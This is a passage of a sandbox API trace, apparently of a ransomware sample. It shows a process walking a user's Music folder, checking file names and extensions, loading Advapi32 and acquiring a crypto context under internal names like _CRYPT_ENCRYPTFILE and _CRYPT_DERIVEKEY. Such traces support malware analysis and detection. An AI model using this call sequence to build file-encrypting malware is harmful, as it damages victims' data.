dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.909] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.909] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0186.909] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.909] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.910] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.910] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.910] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.910] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.910] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x2c837c60, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 0x90ae18 [0186.910] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0186.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.910] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.910] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.910] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0186.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0186.911] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.911] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.911] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0186.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.911] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0186.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.914] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0186.914] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.914] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.914] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.914] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.914] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0186.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.915] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.915] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.915] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.915] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.915] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.915] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.915] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.915] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.915] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.915] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, 